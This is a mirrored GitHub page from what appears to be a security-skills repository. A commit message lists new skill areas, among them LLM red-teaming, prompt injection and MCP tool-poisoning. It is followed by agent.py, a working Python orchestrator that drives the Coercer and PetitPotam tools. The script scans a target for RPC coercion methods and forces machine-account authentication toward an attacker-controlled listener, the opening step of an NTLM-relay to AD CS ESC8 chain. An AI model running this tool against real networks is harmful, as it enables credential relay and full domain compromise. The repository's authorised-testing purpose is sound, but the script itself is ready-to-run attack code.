mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-18 05:29:40 +03:00
8cae0648ec
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and
skills categories (ISC2/WEF/CrowdStrike/Mandiant signals):
- AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT,
prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool
invocation, guardrails, model/data poisoning, system-prompt leakage,
embedding/vector weaknesses, model extraction, continuous red-teaming
- Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion,
malicious-npm triage, typosquatting, SLSA/Sigstore provenance
- Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit,
Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting
- Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy,
shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse
- Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC,
Falco, Trivy, kube-bench
- Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors
- DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso
- Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration
Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md
+ scripts/agent.py + LICENSE), with researched real tool commands (no placeholders),
complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain
table, skill count, and index.json.
130 lines
4.6 KiB
Python
130 lines
4.6 KiB
Python
#!/usr/bin/env python3
|
|
"""
|
|
agent.py - Authentication coercion orchestrator wrapping Coercer / PetitPotam.
|
|
|
|
Drives the real Coercer (p0dalirius) and PetitPotam (topotam) command-line tools
|
|
to (1) scan a target for reachable RPC coercion methods and (2) coerce machine-account
|
|
authentication toward an attacker-controlled listener, the front half of an
|
|
NTLM-relay -> AD CS ESC8 chain.
|
|
|
|
AUTHORIZED USE ONLY. Authentication coercion + NTLM relay can yield full domain
|
|
compromise. Run only against systems you own or are explicitly authorized to test.
|
|
|
|
References:
|
|
- Coercer https://github.com/p0dalirius/Coercer
|
|
- PetitPotam https://github.com/topotam/PetitPotam
|
|
- ESC8/relay https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications
|
|
"""
|
|
import argparse
|
|
import shutil
|
|
import subprocess
|
|
import sys
|
|
|
|
|
|
def _ensure(tool: str) -> str:
|
|
path = shutil.which(tool)
|
|
if not path:
|
|
print(f"[!] required tool not found on PATH: {tool}", file=sys.stderr)
|
|
sys.exit(3)
|
|
return path
|
|
|
|
|
|
def _run(cmd: list) -> int:
|
|
print("[*] exec:", " ".join(cmd))
|
|
try:
|
|
return subprocess.run(cmd, check=False).returncode
|
|
except FileNotFoundError as e:
|
|
print(f"[!] cannot execute: {e}", file=sys.stderr)
|
|
return 3
|
|
except KeyboardInterrupt:
|
|
print("\n[!] interrupted", file=sys.stderr)
|
|
return 130
|
|
|
|
|
|
def coercer_scan(args) -> int:
|
|
"""Probe which RPC coercion methods are reachable on the target."""
|
|
_ensure("coercer")
|
|
cmd = ["coercer", "scan", "-t", args.target, "-l", args.listener]
|
|
if args.username:
|
|
cmd += ["-u", args.username]
|
|
if args.password is not None:
|
|
cmd += ["-p", args.password]
|
|
if args.domain:
|
|
cmd += ["-d", args.domain]
|
|
if args.export_json:
|
|
cmd += ["--export-json", args.export_json]
|
|
return _run(cmd)
|
|
|
|
|
|
def coercer_coerce(args) -> int:
|
|
"""Trigger authentication using Coercer's coerce mode."""
|
|
_ensure("coercer")
|
|
cmd = ["coercer", "coerce", "-t", args.target, "-l", args.listener]
|
|
if args.username:
|
|
cmd += ["-u", args.username]
|
|
if args.password is not None:
|
|
cmd += ["-p", args.password]
|
|
if args.domain:
|
|
cmd += ["-d", args.domain]
|
|
if args.method:
|
|
cmd += ["--filter-method-name", args.method]
|
|
if args.always_continue:
|
|
cmd += ["--always-continue"]
|
|
return _run(cmd)
|
|
|
|
|
|
def petitpotam(args) -> int:
|
|
"""Run PetitPotam.py (MS-EFSR) directly. Expects PetitPotam.py on PATH or via --script."""
|
|
script = args.script or shutil.which("PetitPotam.py") or shutil.which("petitpotam.py")
|
|
if not script:
|
|
print("[!] PetitPotam.py not found; pass --script /path/to/PetitPotam.py",
|
|
file=sys.stderr)
|
|
return 3
|
|
cmd = ["python3", script]
|
|
if args.username:
|
|
cmd += ["-u", args.username]
|
|
if args.password is not None:
|
|
cmd += ["-p", args.password]
|
|
if args.domain:
|
|
cmd += ["-d", args.domain]
|
|
# PetitPotam positional args: <listener> <target>
|
|
cmd += [args.listener, args.target]
|
|
return _run(cmd)
|
|
|
|
|
|
def build_parser() -> argparse.ArgumentParser:
|
|
p = argparse.ArgumentParser(description="Authorized coercion orchestrator (Coercer/PetitPotam).")
|
|
sub = p.add_subparsers(dest="mode", required=True)
|
|
|
|
common = argparse.ArgumentParser(add_help=False)
|
|
common.add_argument("-t", "--target", required=True, help="Target host (e.g. the DC)")
|
|
common.add_argument("-l", "--listener", required=True, help="Listener/relay IP to receive auth")
|
|
common.add_argument("-u", "--username", help="Domain username")
|
|
common.add_argument("-p", "--password", help="Password (may be empty string)")
|
|
common.add_argument("-d", "--domain", help="Domain FQDN")
|
|
|
|
s = sub.add_parser("scan", parents=[common], help="Coercer scan mode")
|
|
s.add_argument("--export-json", help="Write scan results to JSON file")
|
|
s.set_defaults(func=coercer_scan)
|
|
|
|
c = sub.add_parser("coerce", parents=[common], help="Coercer coerce mode")
|
|
c.add_argument("--method", help="Filter a single method name (e.g. PetitPotam)")
|
|
c.add_argument("--always-continue", action="store_true",
|
|
help="Try every method until one succeeds")
|
|
c.set_defaults(func=coercer_coerce)
|
|
|
|
pp = sub.add_parser("petitpotam", parents=[common], help="Run PetitPotam.py directly")
|
|
pp.add_argument("--script", help="Path to PetitPotam.py")
|
|
pp.set_defaults(func=petitpotam)
|
|
return p
|
|
|
|
|
|
def main() -> int:
|
|
args = build_parser().parse_args()
|
|
print("[i] AUTHORIZED TESTING ONLY -- ensure target is in scope.")
|
|
return args.func(args)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
sys.exit(main())
|